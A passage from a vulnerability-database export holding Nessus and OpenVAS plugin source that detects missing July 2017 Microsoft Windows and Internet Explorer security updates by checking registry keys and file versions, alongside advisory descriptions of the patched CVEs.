authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8577)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8578)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics Component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8607)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8608)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engine due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-8610)\");\n # https://support.microsoft.com/en-us/help/4025331/windows-server-2012-update-kb4025331\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?23066c63\");\n # https://support.microsoft.com/en-us/help/4025343/windows-server-2012-update-kb4025343\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6eb83bb8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4025343 or Cumulative update KB4025331.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8589\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-07';\nkbs = make_list(\n '4025331', # 2012 Monthly Rollup\n '4025343' # 2012 Security Rollup\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = FALSE;\n\n# CVE-2017-8563 applies to Server 2012 and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nif (!isnull(ret) && ret == 'LanmanNT')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln = TRUE;\n reg_key_note =\n '\\n The registry key \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\n\nif ( smb_check_rollup(os:\"6.2\", sp:0, rollup_date: \"07_2017\", bulletin:bulletin, rollup_kb_list:[4025331,4025343]) || vuln)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:08", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft browsers improperly handle redirect requests.\n The vulnerability allows Microsoft browsers to bypass\n CORS redirect restrictions, and to follow redirect\n requests that should otherwise be ignored. An attacker\n who successfully exploited the vulnerability could force\n the browser to send data that would otherwise be\n restricted to a destination website of the attacker's\n choice. (CVE-2017-8592)\n\n - A spoofing vulnerability exists when an affected\n Microsoft browser does not properly parse HTTP content.\n An attacker who successfully exploited this\n vulnerability could trick a user by redirecting the user\n to a specially crafted website. The specially crafted\n website could either spoof content or serve as a pivot\n to chain an attack with other vulnerabilities in web\n services. (CVE-2017-8602)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine, when rendered in Internet\n Explorer, handles objects in memory. In a web-based\n attack scenario, an attacker could host a specially\n crafted website that is designed to exploit this\n vulnerability through Internet Explorer and then\n convince a user to view the website. An attacker could\n also embed an ActiveX control marked "safe for\n initialization" in an application or Microsoft\n Office document that hosts the Internet Explorer\n rendering engine. The attacker could also take advantage\n of compromised websites and websites that accept or host\n user-provided content or advertisements. These websites\n could contain specially crafted content that could\n exploit this vulnerability. An attacker who successfully\n exploited this vulnerability could gain the same user\n rights as the current user. (CVE-2017-8618)\n\n - A remote code execution vulnerability exists in the way\n JavaScript engines render when handling objects in\n memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2017-8606, CVE-2017-8607,\n CVE-2017-8608)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8594)", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-30T00:00:00", "title": "Security Updates for Internet Explorer (July 2017)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8608", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8594", "CVE-2017-8592", "CVE-2017-8602", "CVE-2017-8618"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS17_JUL_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/104891", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104891);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-8592\",\n \"CVE-2017-8594\",\n \"CVE-2017-8602\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8618\"\n );\n script_bugtraq_id(\n 99390,\n 99396,\n 99399,\n 99401,\n 99408,\n 99410,\n 99412\n );\n script_xref(name:\"MSKB\", value:\"4025336\");\n script_xref(name:\"MSKB\", value:\"4025331\");\n script_xref(name:\"MSKB\", value:\"4025341\");\n script_xref(name:\"MSKB\", value:\"4025252\");\n script_xref(name:\"MSFT\", value:\"MS17-4025336\");\n script_xref(name:\"MSFT\", value:\"MS17-4025331\");\n script_xref(name:\"MSFT\", value:\"MS17-4025341\");\n script_xref(name:\"MSFT\", value:\"MS17-4025252\");\n\n script_name(english:\"Security Updates for Internet Explorer (July 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft browsers improperly handle redirect requests.\n The vulnerability allows Microsoft browsers to bypass\n CORS redirect restrictions, and to follow redirect\n requests that should otherwise be ignored. An attacker\n who successfully exploited the vulnerability could force\n the browser to send data that would otherwise be\n restricted to a destination website of the attacker's\n choice. (CVE-2017-8592)\n\n - A spoofing vulnerability exists when an affected\n Microsoft browser does not properly parse HTTP content.\n An attacker who successfully exploited this\n vulnerability could trick a user by redirecting the user\n to a specially crafted website. The specially crafted\n website could either spoof content or serve as a pivot\n to chain an attack with other vulnerabilities in web\n services. (CVE-2017-8602)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine, when rendered in Internet\n Explorer, handles objects in memory. In a web-based\n attack scenario, an attacker could host a specially\n crafted website that is designed to exploit this\n vulnerability through Internet Explorer and then\n convince a user to view the website. An attacker could\n also embed an ActiveX control marked "safe for\n initialization" in an application or Microsoft\n Office document that hosts the Internet Explorer\n rendering engine. The attacker could also take advantage\n of compromised websites and websites that accept or host\n user-provided content or advertisements. These websites\n could contain specially crafted content that could\n exploit this vulnerability. An attacker who successfully\n exploited this vulnerability could gain the same user\n rights as the current user. (CVE-2017-8618)\n\n - A remote code execution vulnerability exists in the way\n JavaScript engines render when handling objects in\n memory in Microsoft browsers. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2017-8606, CVE-2017-8607,\n CVE-2017-8608)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8594)\");\n # https://support.microsoft.com/en-us/help/4025336/windows-8-update-kb4025336\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60b27ab9\");\n # https://support.microsoft.com/en-us/help/4025331/windows-server-2012-update-kb4025331\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?23066c63\");\n # https://support.microsoft.com/en-us/help/4025341/windows-7-update-kb4025341\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?38156f30\");\n # https://support.microsoft.com/en-us/help/4025252/cumulative-security-update-for-internet-explorer-july-11-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e9951911\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for the affected versions of Internet Explorer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-07';\nkbs = make_list(\n '4025336',\n '4025331',\n '4025341',\n '4025252'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18739\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22207\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18739\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n\n # Vista / Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21029\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.16918\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4025252 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4025336 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-07', kb:'4025336', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4025331 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-07', kb:'4025331', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4025341 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-07', kb:'4025341', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-08T13:50:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025339", "modified": "2019-12-20T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811515", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811515", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025339)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025339)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811515\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8592\", \"CVE-2017-8595\", \"CVE-2017-8596\", \"CVE-2017-8598\",\n \"CVE-2017-8599\", \"CVE-2017-8601\", \"CVE-2017-8602\", \"CVE-2017-0170\",\n \"CVE-2017-8463\", \"CVE-2017-8603\", \"CVE-2017-8604\", \"CVE-2017-8605\",\n \"CVE-2017-8606\", \"CVE-2017-8607\", \"CVE-2017-8467\", \"CVE-2017-8486\",\n \"CVE-2017-8608\", \"CVE-2017-8609\", \"CVE-2017-8611\", \"CVE-2017-8618\",\n \"CVE-2017-8495\", \"CVE-2017-8556\", \"CVE-2017-8619\", \"CVE-2017-8557\",\n \"CVE-2017-8561\", \"CVE-2017-8562\", \"CVE-2017-8563\", \"CVE-2017-8564\",\n \"CVE-2017-8565\", \"CVE-2017-8566\", \"CVE-2017-8573\", \"CVE-2017-8574\",\n \"CVE-2017-8577\", \"CVE-2017-8578\", \"CVE-2017-8580\", \"CVE-2017-8581\",\n \"CVE-2017-8582\", \"CVE-2017-8584\", \"CVE-2017-8585\", \"CVE-2017-8588\",\n \"CVE-2017-8589\", \"CVE-2017-8590\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 09:39:04 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4025339)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4025339\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists when,\n\n - Microsoft Windows fails to properly handle objects in memory.\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - Windows Explorer improperly handles executable files and shares during\n rename operations.\n\n - An affected Microsoft browser does not properly parse HTTP content.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM)\n Authentication Protocol as the default authentication protocol.\n\n - Windows Kernel improperly handles objects in memory.\n\n - The Windows kernel fails to properly initialize a memory address,\n allowing an attacker to retrieve information that could lead to a Kernel Address\n Space Layout Randomization (KASLR) bypass.\n\n - PSObject wraps a CIM Instance.\n\n - Microsoft Graphics Component fails to properly handle objects in memory.\n\n - VBScript engine, when rendered in Internet Explorer, improperly handles\n objects in memory.\n\n - Microsoft Browsers improperly handle redirect requests.\n\n - Microsoft Windows when Kerberos fails to prevent tampering with the SNAME\n field during ticket exchange.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows System Information Console when it improperly parses XML input\n containing a reference to an external entity.\n\n - Windows Performance Monitor Console when it improperly parses XML\n input containing a reference to an external entity.\n\n - Microsoft WordPad parses specially crafted files.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Explorer attempts to open a non-existent file.\n\n - Windows improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, gain the same\n user rights as the current user, run arbitrary code in the context of another\n user, trick a user by redirecting the user to a specially crafted website, run\n processes in an elevated cretrieve the base address of the kernel driver from\n a compromised process, embed an ActiveX control marked 'safe for initialization'\n in an application or Microsoft Office document that hosts the Internet Explorer\n rendering engine, force the browser to send data that would otherwise be\n restricted to a destination web site of their choice, bypass Extended Protection\n for Authentication, read arbitrary files via an XML external entity (XXE)\n declaration and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025339\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1477\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.14393.0 - 11.0.14393.1478\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:21:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "description": "This host is missing a critical security\n update according to Microsoft KB4025344", "modified": "2020-06-04T00:00:00", "published": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310811456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811456", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4025344)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4025344)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public 